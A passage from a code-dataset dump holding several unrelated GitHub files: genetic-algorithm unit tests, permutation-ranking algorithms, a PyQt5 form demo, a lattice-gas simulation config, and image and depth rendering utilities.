Training\")\n\n # histogram of the features\n # histogram of the positive and negative\n # PCA could reduce \n # luminance and chromanance\n # 8-bit pixel depth vs np.float\n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"owebb1/cancerous-image-classifier","sub_path":"src/svm_image_cancer_code.py","file_name":"svm_image_cancer_code.py","file_ext":"py","file_size_in_byte":14040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10008273409","text":"\n# Standard library\nfrom typing import List\nfrom unittest import mock\n\n# 3rd party packages\nimport pytest\n\n# Local source\nfrom parametrization_clean.domain.individual import Individual\nfrom parametrization_clean.domain.selection.tournament import 
TournamentSelect\nfrom parametrization_clean.domain.mutation.gauss import GaussianMutate\nfrom parametrization_clean.domain.crossover.double_pareto import DoubleParetoCross\nfrom parametrization_clean.domain.adaptation.xiao import XiaoAdapt\nfrom parametrization_clean.use_case.population_propagator import PopulationPropagator\nfrom parametrization_clean.domain.root_individual import RootIndividual\nfrom parametrization_clean.use_case.port.population_repository import IPopulationRepository\nfrom tests.fixtures.domain import dft_energies, weights, root_ffield, param_keys\n\n\n@pytest.fixture()\n@pytest.mark.usefixtures('dft_energies', 'weights', 'root_ffield', 'param_keys')\ndef root_individual(dft_energies, weights, root_ffield, param_keys):\n root_individual = RootIndividual(dft_energies, weights, root_ffield, param_keys)\n return root_individual\n\n\n@pytest.fixture()\ndef population_repository(root_individual):\n class TestPopulationRepository(IPopulationRepository):\n def get_root_individual(self) -> RootIndividual:\n return root_individual\n\n def get_population(self, generation_number: int) -> List[Individual]:\n pass\n\n def get_previous_n_populations(self, num_populations: int) -> List[Individual]:\n pass\n\n def write_individual(self, individual: Individual, **kwargs):\n pass\n\n def write_population(self, population: List[Individual], generation_number):\n pass\n\n return TestPopulationRepository()\n\n\n@pytest.fixture()\n@mock.patch('parametrization_clean.use_case.port.settings_repository.IAllSettings')\n@pytest.mark.usefixtures('param_bounds')\ndef all_settings(all_settings_mock, param_bounds):\n all_settings_mock.strategy_settings.selection_strategy = TournamentSelect\n all_settings_mock.strategy_settings.mutation_strategy = GaussianMutate\n all_settings_mock.strategy_settings.crossover_strategy = DoubleParetoCross\n all_settings_mock.strategy_settings.adaptation_strategy = XiaoAdapt\n\n all_settings_mock.ga_settings.population_size = 4\n all_settings_mock.ga_settings.mutation_rate = 0.20\n all_settings_mock.ga_settings.crossover_rate = 0.80\n all_settings_mock.ga_settings.use_elitism = True\n all_settings_mock.ga_settings.use_adaptation = False\n all_settings_mock.ga_settings.use_neural_network = False\n\n all_settings_mock.mutation_settings.gauss_std = [0.10]\n all_settings_mock.mutation_settings.gauss_frac = [1.0]\n all_settings_mock.mutation_settings.nakata_rand_lower = -1.0\n all_settings_mock.mutation_settings.nakata_rand_higher = 1.0\n all_settings_mock.mutation_settings.nakata_scale = 0.10\n all_settings_mock.mutation_settings.polynomial_eta = 60\n all_settings_mock.mutation_settings.param_bounds = param_bounds\n\n all_settings_mock.crossover_settings.dpx_alpha = 10\n all_settings_mock.crossover_settings.dpx_beta = 1\n\n all_settings_mock.selection_settings.tournament_size = 2\n\n all_settings_mock.adaptation_settings.srinivas_k1 = 1.0\n all_settings_mock.adaptation_settings.srinivas_k2 = 0.5\n all_settings_mock.adaptation_settings.srinivas_k3 = 1.0\n all_settings_mock.adaptation_settings.srinivas_k4 = 0.5\n all_settings_mock.adaptation_settings.srinivas_default_mutation_rate = 0.005\n all_settings_mock.adaptation_settings.xiao_min_crossover_rate = 0.4\n all_settings_mock.adaptation_settings.xiao_min_mutation_rate = 0.1\n all_settings_mock.adaptation_settings.xiao_scale = 0.4\n\n return all_settings_mock\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\ndef test_population_propagator_init(population_repository_mock, 
all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n propagator = PopulationPropagator(all_settings, population_repository_mock)\n\n assert propagator.ga_settings.population_size == 4\n assert propagator.ga_settings.mutation_rate == 0.20\n assert propagator.ga_settings.crossover_rate == 0.80\n assert propagator.ga_settings.use_elitism\n assert not propagator.ga_settings.use_adaptation\n assert not propagator.ga_settings.use_neural_network\n\n assert propagator.crossover_rate == 0.80\n assert propagator.mutation_rates == [0.20, 0.20]\n\n assert propagator.mutation_strategy == all_settings.strategy_settings.mutation_strategy\n assert propagator.crossover_strategy == all_settings.strategy_settings.crossover_strategy\n assert propagator.selection_strategy == all_settings.strategy_settings.selection_strategy\n\n assert propagator.mutation_settings_dict['gauss_std'] == [0.10]\n assert propagator.mutation_settings_dict['gauss_frac'] == [1.0]\n assert propagator.mutation_settings_dict['nakata_rand_lower'] == -1.0\n assert propagator.mutation_settings_dict['nakata_rand_higher'] == 1.0\n assert propagator.mutation_settings_dict['nakata_scale'] == 0.10\n assert propagator.mutation_settings_dict['polynomial_eta'] == 60\n assert propagator.mutation_settings_dict['param_bounds'] == [[0.0, 2.0],\n [0.0, 0.5],\n [-1.0, 0.0],\n [3.0, 12.0],\n [1.0, 3.0]]\n\n assert propagator.crossover_settings_dict['dpx_alpha'] == 10\n assert propagator.crossover_settings_dict['dpx_beta'] == 1\n\n assert propagator.selection_settings_dict['tournament_size'] == 2\n\n assert propagator.adaptation_settings_dict['srinivas_k1'] == 1.0\n assert propagator.adaptation_settings_dict['srinivas_k2'] == 0.5\n assert propagator.adaptation_settings_dict['srinivas_k3'] == 1.0\n assert propagator.adaptation_settings_dict['srinivas_k4'] == 0.5\n assert propagator.adaptation_settings_dict['xiao_min_crossover_rate'] == 0.4\n assert propagator.adaptation_settings_dict['xiao_min_mutation_rate'] == 0.1\n assert propagator.adaptation_settings_dict['xiao_scale'] == 0.4\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_initialize(population_repository_mock, get_individuals, root_individual, all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n costs = []\n for individual in get_individuals:\n individual.cost = individual.total_error(root_individual)\n costs.append(individual.cost)\n propagator = PopulationPropagator(all_settings, population_repository_mock)\n sorted_costs = sorted(costs)\n\n children = propagator.initialize(get_individuals)\n assert len(children) == 2\n assert children[0].cost == sorted_costs[0]\n assert children[1].cost == sorted_costs[1]\n\n propagator.ga_settings.use_elitism = False\n children = propagator.initialize(get_individuals)\n assert len(children) == 0\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_select(population_repository_mock, get_individuals, root_individual, all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n for individual in get_individuals:\n individual.cost = individual.total_error(root_individual)\n propagator = PopulationPropagator(all_settings, 
population_repository_mock)\n\n selected_individual = propagator.select(get_individuals)\n assert selected_individual in get_individuals\n\n\n@mock.patch('random.random')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_cross(rand_mock, population_repository, get_individuals, all_settings):\n propagator = PopulationPropagator(all_settings, population_repository)\n parent1 = get_individuals[0]\n parent2 = get_individuals[1]\n\n rand_mock.return_value = 0.60\n child1, child2 = propagator.cross(parent1, parent2)\n assert child1.params != parent1.params and child1.params != parent2.params\n assert child2.params != parent2.params and child2.params != parent1.params\n\n rand_mock.return_value = 0.90\n child1, child2 = propagator.cross(parent1, parent2)\n assert child1.params == parent1.params and child2.params == parent2.params\n\n\n@mock.patch('random.random')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_mutate(rand_mock, population_repository, get_individuals, all_settings):\n propagator = PopulationPropagator(all_settings, population_repository)\n parent1 = get_individuals[0]\n parent2 = get_individuals[1]\n\n propagator.mutation_rates = [0.20, 0.20]\n rand_mock.return_value = 0.10\n child1, child2 = propagator.mutate(parent1, parent2)\n assert child1.params != parent1.params\n assert child2.params != parent2.params\n\n propagator.mutation_rates = [0.20, 0.05]\n child1, child2 = propagator.mutate(parent1, parent2)\n assert child1.params != parent1.params\n assert child2.params == parent2.params\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_adapt(population_repository_mock, get_individuals, root_individual, all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n for individual in get_individuals:\n individual.cost = individual.total_error(root_individual)\n\n propagator = PopulationPropagator(all_settings, population_repository_mock)\n propagator.ga_settings.use_adaptation = True\n\n # Two mock dictionaries passed in kwargs for adaptation...must remove duplicate keys\n propagator.ga_settings_dict.pop('_mock_return_value')\n propagator.ga_settings_dict.pop('_mock_parent')\n propagator.ga_settings_dict.pop('_mock_name')\n propagator.ga_settings_dict.pop('_mock_new_name')\n propagator.ga_settings_dict.pop('_mock_new_parent')\n propagator.ga_settings_dict.pop('_mock_sealed')\n propagator.ga_settings_dict.pop('_spec_class')\n propagator.ga_settings_dict.pop('_spec_set')\n propagator.ga_settings_dict.pop('_spec_signature')\n propagator.ga_settings_dict.pop('_mock_methods')\n propagator.ga_settings_dict.pop('_mock_children')\n propagator.ga_settings_dict.pop('_mock_wraps')\n propagator.ga_settings_dict.pop('_mock_delegate')\n propagator.ga_settings_dict.pop('_mock_called')\n propagator.ga_settings_dict.pop('_mock_call_args')\n propagator.ga_settings_dict.pop('_mock_call_count')\n propagator.ga_settings_dict.pop('_mock_call_args_list')\n propagator.ga_settings_dict.pop('_mock_mock_calls')\n propagator.ga_settings_dict.pop('method_calls')\n propagator.ga_settings_dict.pop('_mock_unsafe')\n propagator.ga_settings_dict.pop('_mock_side_effect')\n # Two mock dictionaries passed in kwargs for adaptation...must remove duplicate keys\n\n average_cost, minimum_cost = propagator.compute_statistics(get_individuals)\n parent1_cost = get_individuals[2].cost\n 
parent2_cost = get_individuals[3].cost\n propagator.adapt_cross_and_mutate_rates(average_cost, minimum_cost, (parent1_cost, parent2_cost))\n assert propagator.crossover_rate != 0.80\n assert propagator.mutation_rates[0] != 0.20\n assert propagator.mutation_rates[1] == 0.20\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_compute_statistics(population_repository_mock, get_individuals,\n root_individual, all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n for individual in get_individuals:\n individual.cost = individual.total_error(root_individual)\n propagator = PopulationPropagator(all_settings, population_repository_mock)\n parents = get_individuals\n\n average_cost, minimum_cost = propagator.compute_statistics(parents)\n assert average_cost == pytest.approx(1037.955, rel=1e-3)\n assert minimum_cost == pytest.approx(239.558, rel=1e-3)\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_execute(population_repository_mock, get_individuals, root_individual, all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n for individual in get_individuals:\n individual.cost = individual.total_error(root_individual)\n propagator = PopulationPropagator(all_settings, population_repository_mock)\n parents = get_individuals\n\n children = propagator.execute(parents)\n\n assert len(children) == 4\n","repo_name":"cdaksha/parametrization_clean","sub_path":"tests/use_case/test_population_propagator.py","file_name":"test_population_propagator.py","file_ext":"py","file_size_in_byte":13164,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"33679009181","text":"import math\n\n__author__ = \"Bram Devlaminck\"\n\n\ndef perm_lex_successor(input_permutation: list[int]) -> list[int] | None:\n \"\"\"\n Algorithm 2.14\n\n Return the successor if it exists, otherwise return None\n \"\"\"\n n: int = len(input_permutation)\n # take a copy of input and add 0 to start to insure while loop later terminates\n permutation = [0] + input_permutation[::]\n # find i such that perm[i] < perm[i+1] > perm[i + 2] > ... 
> perm[n]\n i = n - 1\n while i >= 1 and permutation[i + 1] < permutation[i]:\n i -= 1\n if i == 0:\n return None\n\n # find j such that perm[j] > perm[i] and perm[k] < perm[i] for j < k <= n\n j = n\n while j >= 1 and permutation[j] < permutation[i]:\n j -= 1\n\n # switch the values at index j and i\n permutation[i], permutation[j] = permutation[j], permutation[i]\n\n # reverse the sublist [perm[i+1, ..., perm[n]] and return (and remove the 0 at the beginning)\n return permutation[1:i + 1] + permutation[i + 1:][::-1]\n\n\ndef perm_lex_rank(input_permutation: list[int]) -> int:\n \"\"\"Algorithm 2.15\"\"\"\n n = len(input_permutation)\n r = 0\n permutation = input_permutation[::]\n for j in range(n):\n # j + 1 in the factorial since indices start at 0, but we need to start counting this multiplication from 1\n r += (permutation[j] - 1) * math.factorial(n - (j + 1))\n for i in range(j + 1, n):\n if permutation[i] > permutation[j]:\n permutation[i] -= 1\n\n return r\n\n\ndef perm_lex_unrank(n: int, rank: int) -> list[int]:\n \"\"\"Algorithm 2.16\"\"\"\n\n permutation = [0 for _ in range(n)]\n permutation[-1] = 1\n\n for j in range(1, n):\n j_faculty = math.factorial(j)\n d = (rank % (j_faculty * (j + 1))) // j_faculty\n rank -= d * j_faculty\n permutation[n - j - 1] = d + 1\n for i in range(n - j, n):\n if permutation[i] > d:\n permutation[i] += 1\n\n return permutation\n\n\ndef trotter_johnson_rank(permutation: list[int]) -> int:\n \"\"\"Algorithm 2.17\"\"\"\n n = len(permutation)\n rank = 0\n for j in range(2, n + 1):\n k = 1\n i = 0\n # search for the location of j in the permutation, in this iteration we see j as the \"biggest value\"\n # of the permutation => ignore all the values that are bigger than j to calculate the position\n while permutation[i] != j:\n # we ignore all the values bigger than j to calculate the position of j in the permutation\n # since as explained earlier: we see j as the maximum value of the permutation\n # all the other values are only \"inserted later\" by recursion (if we had implemented this recursively)\n if permutation[i] < j:\n k += 1\n i += 1\n\n # adjust the rank appropriately depending on if we were on an even or odd rank\n if rank % 2 == 0:\n rank = j * rank + j - k\n else:\n rank = j * rank + k - 1\n\n return rank\n\n\ndef trotter_johnson_unrank(n: int, rank: int) -> list[int]:\n \"\"\"Algorithm 2.18\"\"\"\n\n # the base permutation is just the value 1, we will add to this to create the final permutation\n permutation = [1]\n r2 = 0\n\n for j in range(2, n + 1):\n r1 = math.floor(rank * math.factorial(j) / math.factorial(n))\n k = (r1 - j * r2)\n # calculate until where we have to loop\n end_index = j - k - 2 if r2 % 2 == 0 else k - 1\n # perform insertion at right index\n # (doing it this way removes the need to manually move all the elements to the right)\n permutation.insert(end_index + 1, j)\n\n # update r2 with r1\n r2 = r1\n\n return permutation\n\n\ndef perm_parity(permutation: list[int]) -> int:\n \"\"\"Algorithm 2.19\"\"\"\n n = len(permutation)\n visited = [False for _ in range(n)]\n number_of_circuits = 0\n for j in range(n):\n # if not visited[j] => count it as a circuit and visit the complete circuit\n if not visited[j]:\n number_of_circuits += 1\n visited[j] = True\n # expand this current circuit,\n # to make sure we don't count the other nodes that are in this circuit as a separate circuit\n # \"permutation[i] != j + 1\" will be False when we revisit the node that we started\n # => we don't follow the circuit endlessly\n i = j\n while 
permutation[i] != j + 1:\n i = permutation[i] - 1\n visited[i] = True\n return (n - number_of_circuits) % 2\n\n\ndef trotten_johnson_successor(input_permutation: list[int]) -> list[int] | None:\n \"\"\"\n Algorithm 2.20\n\n Return the successor if it exists, otherwise return None\n \"\"\"\n n = len(input_permutation)\n start_index = 0\n # this is a copy used to modify and \"simulate\" the recursive formulation of the algorithm\n working_permutation = input_permutation[::]\n # in this array we build op our result\n permutation = input_permutation[::]\n\n done = False\n m = n\n while m > 1 and not done:\n # search the index of where the maximum value is located in the permutation\n d = working_permutation.index(m)\n\n # simulate the recursion by removing the biggest element d out of the permutation\n del working_permutation[d]\n\n if perm_parity(working_permutation) == 1:\n # odd parity\n\n # we are at the end => decrease m for smaller recursive step where we need to transpose 2 values\n if d == m - 1:\n m -= 1\n else:\n # not at the end of the diagonal => transpose here\n permutation[start_index + d], permutation[start_index + d + 1] = permutation[start_index + d + 1], permutation[start_index + d]\n done = True\n else:\n # even parity\n\n # we are at the beginning => decrease m for smaller recursive step where we need to transpose 2 values\n # and increase start index\n if d == 0:\n m -= 1\n start_index += 1\n else:\n # not at the beginning of the diagonal => transpose here\n permutation[start_index + d], permutation[start_index + d - 1] = permutation[start_index + d - 1], permutation[start_index + d]\n done = True\n # no successor exists\n if m == 1:\n return None\n\n # return the successor\n return permutation\n\n\ndef generate_heaps_algorithm(k: int) -> list[list[int]]:\n \"\"\"\n The first simple (recursive) generate algorithm from the wikipedia page: https://en.wikipedia.org/wiki/Heap%27s_algorithm\n \"\"\"\n\n def generate_recursive(k: int, current_res: list[int]) -> list[list[int]]:\n \"\"\"Recursive step for the generate algorithm\"\"\"\n if k == 1:\n # take copy since otherwise we will be mutating this exact array laster in another recursive step\n return [current_res[::]]\n else:\n results = []\n # recursive step for unchanged array\n results += generate_recursive(k - 1, current_res)\n # do mutations and recursive steps on these mutations\n for i in range(k - 1):\n if k % 2 == 0:\n current_res[i], current_res[k - 1] = current_res[k - 1], current_res[i]\n else:\n current_res[0], current_res[k - 1] = current_res[k - 1], current_res[0]\n # add results of recursive steps\n results += generate_recursive(k - 1, current_res)\n # return all the recursive steps\n return results\n\n return generate_recursive(k, [i + 1 for i in range(k)])\n\n\nif __name__ == \"__main__\":\n print(perm_lex_successor([1, 2, 3]))\n print(\"-----------\")\n print(perm_lex_rank([2, 4, 1, 3]))\n print(\"-----------\")\n print(perm_lex_unrank(4, 10))\n print(\"-----------\")\n print(trotter_johnson_rank([3, 4, 2, 1]))\n print(\"-----------\")\n print(trotter_johnson_unrank(4, 13))\n print(\"-----------\")\n print(perm_parity([5, 1, 3, 4, 2]))\n print(\"-----------\")\n print(trotten_johnson_successor([4, 3, 1, 2]))\n print(\"-----------\")\n 
print(generate_heaps_algorithm(3))\n","repo_name":"BramDevlaminck/DiscreteAlgorithmsCombinatorialGeneration","sub_path":"permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":8221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71316931772","text":"import sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QToolTip\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import QRect, QSize\n\n\nclass MyWindow(QMainWindow) :\n def __init__(self) :\n super(MyWindow, self).__init__()\n self.setWindowTitle(\"ilk form uygulamam - 2 Class Uygulaması\")\n self.setGeometry(0, 0, 500, 500)\n self.setWindowIcon(QIcon('icon.png'))\n self.setToolTip(\"Class Uygulaması\")\n self.initUI()\n \n def initUI(self) :\n self.lbl_name = QtWidgets.QLabel(self)\n self.lbl_name.setText(\"adınız : \")\n self.lbl_name.move(50, 30)\n\n self.lbl_surname = QtWidgets.QLabel(self)\n self.lbl_surname.setText(\"Soyadınız : \")\n self.lbl_surname.move(50, 60)\n\n self.lbl_result = QtWidgets.QLabel(self)\n self.lbl_result.setText(\"Sonuç : \") \n self.lbl_result.resize(300,32)\n self.lbl_result.move(150, 190)\n\n self.txt_name = QtWidgets.QLineEdit(self)\n self.txt_name.move(150, 30) \n self.txt_name.resize(200, 32)\n\n self.txt_surname = QtWidgets.QLineEdit(self)\n self.txt_surname.move(150, 60)\n self.txt_surname.resize(200, 32)\n\n \n self.btn_save = QtWidgets.QPushButton(self)\n self.btn_save.setText(\"Kaydet\")\n self.btn_save.move(150, 100)\n self.btn_save.clicked.connect(self.tikla)\n\n\n ###### Son eklemeler START ######################\n self.btn_yeni = QtWidgets.QPushButton(\"yeni\",self)\n self.btn_yeni.setIcon(QIcon(\"green.ico\"))\n self.btn_yeni.setIconSize(QSize(50,50)) ## w,h\n self.btn_yeni.setGeometry(QRect(150,250,100,75)) ## x,y,w,h\n ###### Son eklemeler START ######################\n\n\n \n\n def tikla(self) : \n print(\"Merhaba \"+ self.txt_name.text() + \" \" + self.txt_surname.text())\n self.lbl_result.setText(\"Sonuç : Merhaba \"+ self.txt_name.text() + \" \" + self.txt_surname.text()) \n\n \n\ndef window() :\n app = QApplication(sys.argv)\n win = MyWindow()\n \n\n win.show()\n sys.exit(app.exec_()) # x ile kapatılabilme\n\nwindow()\n\n","repo_name":"bm-snnsmsk/my_workshop","sub_path":"python/002_pyqt5/003_QtWidgetler_class.py","file_name":"003_QtWidgetler_class.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70545811451","text":"import os\nimport AbstractionLayer as QLGA\n\n\n\n######################################################################################\n############################# SIMULATION PARAMS ######################################\n######################################################################################\n#### LATTICE INFO ####\n# For particles >=2, (x,y,z) represents indices of number basis kets along each direction, ie. 
if xDim=L then XBLOCK*XGRID = L(2*L-1)\nPARTICLES = 1\nKINETIC_OPERATOR = 'S' # S for Schroedinger equation, D for Dirac ...\nFRAME_SIZE = 5\nNUM_FRAMES = 2\n\n\nLx = 128 # Parameter to scale lattice size along x\nLy = 128 # Parameter to scale lattice size along y\nLz = 128 # Parameter to scale lattice size along z\n\n## the following are directory names defined by the user\nBATCH = 'Multi_run_test'\nRUN ='sols 1, 3'\n\n\nDEVICES = [0,1] # References to devices to use\n\n##Visualization only for existing data\nVIS_ONLY = False\n\n## Animation only\nANI_ONLY = False\n\n## Overwrite Existing files\nOVERWRITE = True\n######################################################################################\n########################## SIMULATION PARAMS END #####################################\n######################################################################################\n\n\n############################# INITIAL CONDITIONS #####################################\n\n\n#INIT = \"gaussians_2P_1D\"\nINIT = 'double_quadrupole_3d'\n#INIT = 'double_quadrupole'\n#INIT = 'pade_quadrupole'\n\n\n############################ SIMULATION PHYSICS MODEL ################################\n\nMODEL = 'spin2_BEC'\n# MODEL = \"No_Self_Interaction\"\n# MODEL = \"Internal_Function\"\n\n\n\n############################ EXPERIMENT KEYWORDS #####################################\n\n# default keywords can be found in each file in the following directory\n# Code/Initialization/CUDA_Initializations/Default/ [initial condition name]\n# Values defined in each function declaration are the default values\n# if EXP_KWARGS below are defined they will be passed to overwrite the defaults\n# make a checkbox that can be used to input each value manually and overwrite defaults\n\n# where all kwargs are passed can be found defined in Code/Initialization/initializations.py lines 79-83\n# under compile_model_source function declaration\n\n# when using default values define an empty set\n# e.g. EXP_KWARGS = {}\n\n# EXP_KWARGS = {'G0' : 1., 'G1' : .1, 'G2': 1., 'MU':1., 'scaling' : 5, \"solution1\" : 5, \"orientation1\" : \"x\"}\nEXP_KWARGS = {'G0' : 1., 'G1' : .1, 'G2': 1., 'MU':1., 'scaling' : 25, \"solution1\" : 1,\"solution2\" : 3, \"orientation2\" : \"x\", \"y_shift2\" : 1./4.}\n# EXP_KWARGS = {'momentums': [4.0, 0.0, 4.0, 0.0], 'shifts': [0.3, 0.7, 0.4, 0.8], 'sigmas': [0.025, 0.025, 0.25, 0.25]}\n### 'cond_list': ['X1==X2', 'true'], 'func_list': ['0.', '(4.*pi)*(1./abs(X1-X2))'], coulomb\n\n########################### EXTERNAL POTENTIAL #####################################\n\n\nPOTENTIAL = \"No_Potential\"\nPOTENTIAL_KWARGS = {}\n# POTENTIAL = \"External_Function\"\n# POTENTIAL_KWARGS = {\"cond_list\":[\"X1Lx/10.) || (X1>Lx/10. && X2=Lx/2. && X2>=Lx/2.\",\"X1=Lx/2.\", \"X1>=Lx/2. && X2= 0.5] = 1;\n mask = mask[..., None] # [H, W, 1];\n num_none_zeros_pixels = mask.sum()\n # sum(diff**2) / num_pixels, the pixels' difference;\n if in_masks:\n mse = (np.abs(im1*mask - im2*mask) ** 2).sum() / num_none_zeros_pixels\n else:\n mse = (np.abs(im1*mask - im2*mask) ** 2).mean() # only calculate the \n psnr = 10 * np.log10(255 * 255 / mse)\n return psnr\n\n# 0. 
basic utils.\ndef seed_everything(seed):\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\ndef save_rgb_dsr_results(opts, visuals, local_rank, subject_name, epoch, idx, phase='training'):\n image_dir = os.path.join(opts.model_dir, phase)\n make_dir(image_dir)\n save_path_rgb = os.path.join(image_dir, 'rgb_{}_rank{}_epoch{}_idx_dsr{}.jpg'.format(subject_name, local_rank, epoch, idx))\n \n if opts.is_train:\n assert opts.batch_size == 1, 'validating batch size must be 1.'\n \n input_rgbs, target_rgbs, blend_high_freq, \\\n predicted_rgbs, rgbs_refine, input_normals = \\\n visuals['rgbs'], visuals['target_rgbs'], visuals['_blend_high_fq'], \\\n visuals['_rgbs'], visuals['_rgbs_refine'], visuals['_r_normals'] ;\n \n input_rgbs = input_rgbs.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n target_rgbs = target_rgbs.view(-1, 3, opts.img_size, opts.img_size)\n input_normals = F.interpolate(input_normals.view(-1, 3, opts.load_size, opts.load_size), (opts.img_size,opts.img_size), mode='bilinear')\n input_normals = input_normals.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n \n # rgbs_warpped = (rgbs_wp_left + rgbs_wp_right) / 2.0 # [1k, 1k]\n rgbs_warpped = torch.clamp( blend_high_freq, 0, 1.0 ) # clamp to [0,1]\n predicted_rgbs = predicted_rgbs.view(-1, opts.load_size, opts.load_size, 3).permute(0, 3, 1, 2)\n predicted_rgbs = F.interpolate(predicted_rgbs, (opts.img_size, opts.img_size), mode='bilinear')\n rgbs_refine = torch.clamp( rgbs_refine.view(-1, 3, opts.img_size, opts.img_size), 0.0, 1.0 )\n \n predicted_rgbs_ = predicted_rgbs[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n rgbs_warpped_ = rgbs_warpped[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n rgbs_refine_ = rgbs_refine[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n \n _rgbs = []; _depths = [];\n for i in range(opts.num_views):\n _rgbs.append( input_rgbs[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 ) # [H,W,3]\n # _input_depth = input_depths[0,i].detach().cpu().numpy() # [H,W]\n # _input_depth = np.clip( (_input_depth + 1)*0.5, 0, 1)\n # _input_depth = np.stack([_input_depth]*3, axis=-1) # [H,W,3]\n _depths.append( input_normals[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 )\n \n # [H,W*3,3]\n _rgbs = np.concatenate(_rgbs, axis=1)\n _depths = np.concatenate( _depths, axis=1 )\n \n # get predicted results.\n _target_rgbs = target_rgbs[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n # _target_depths = target_depths[0,0].detach().cpu().numpy()\n \n # _target_depths = np.clip( (_target_depths + 1)*0.5, 0, 1)\n # _target_depths = np.stack([_target_depths]*3, axis=-1) * 255 # [H,W,3]\n \n # rgbs = []; depths = []; _rgbs = []; _depths = [];\n # for i in range(opts.batch_size): # the \n # rgbs.append( predicted_rgbs_[i] )\n # depths.append( predicted_depths_[i] )\n # _rgbs.append( target_rgbs[i,0].permute(1,2,0).detach().cpu().numpy() * 255.0 )\n # _depths.append( target_depths[i,0,0].detach().cpu().numpy() * 10000.0 )\n\n # rgbs = np.concatenate(rgbs, axis=1) # [H, W*B, 3]\n # depths = np.concatenate(depths, axis=1) # [H, W*B]\n # _rgbs = np.concatenate(_rgbs, axis=1) # [H, W*B, 3]\n # _depths = np.concatenate(_depths, axis=1) # [H, W*B]\n \n _rgbs = np.concatenate([_rgbs, _target_rgbs, predicted_rgbs_], axis=1)\n _depths = np.concatenate([_depths, rgbs_warpped_, rgbs_refine_], axis=1)\n output = np.concatenate([_rgbs, _depths], axis=0)\n \n Image.fromarray( output.astype(np.uint8) 
).save(save_path_rgb)\n\ndef save_rgb_depths_depthdenoising(opts, visuals, local_rank, subject_name, epoch, idx, phase='training'):\n image_dir = os.path.join(opts.model_dir, phase)\n make_dir(image_dir)\n\n input_rgbs, input_masks, predicted_depths, predicted_normals = \\\n visuals['rgbs'], visuals['masks'], visuals['_r_depths'], visuals['_r_normals']\n\n input_rgbs = input_rgbs.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n input_masks = input_masks.view(-1, opts.num_views, 1, opts.img_size, opts.img_size) # [B,1,H,W]\n predicted_depths = predicted_depths.view(-1, opts.num_views, 1, opts.img_size, opts.img_size);\n predicted_normals = predicted_normals.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n predicted_depths, _, _, _ = _depth_normalizer(predicted_depths[:, :, 0], opts.valid_depth_min, opts.valid_depth_max)\n\n _rgbs = []; _depths = []; _normals = []\n for i in range(opts.num_views):\n _rgbs.append( input_rgbs[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 ) # [H,W,3]\n _input_depth = predicted_depths[0,i].detach().cpu().numpy() # [H,W]\n _input_depth = np.clip( (_input_depth + 1)*0.5, 0, 1)\n _input_depth = np.stack([_input_depth]*3, axis=-1) # [H,W,3]\n _depths.append( _input_depth * 255.0 )\n _normals.append( predicted_normals[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 ) # [H,W,3]\n\n _rgbs = np.concatenate(_rgbs, axis=1)\n _depths = np.concatenate( _depths, axis=1 )\n _normals = np.concatenate( _normals, axis=1 )\n\n output = np.concatenate([_rgbs, _depths, _normals], axis=0)\n\n save_path_rgb = os.path.join( image_dir, 'rgb_{}_rank{}_epoch{}_idx{}.jpg'.format(subject_name, local_rank, epoch, idx) )\n\n Image.fromarray( output.astype(np.uint8) ).save(save_path_rgb)\n\ndef save_rgb_depths_1k(opts, visuals, local_rank, subject_name, epoch, idx, phase='training'):\n image_dir = os.path.join(opts.model_dir, phase)\n make_dir(image_dir)\n \n if opts.is_train:\n assert opts.batch_size == 1, 'validating batch size must be 1.'\n \n input_rgbs, input_depths, input_masks, \\\n target_rgbs, target_depths, target_masks, \\\n predicted_rgbs, 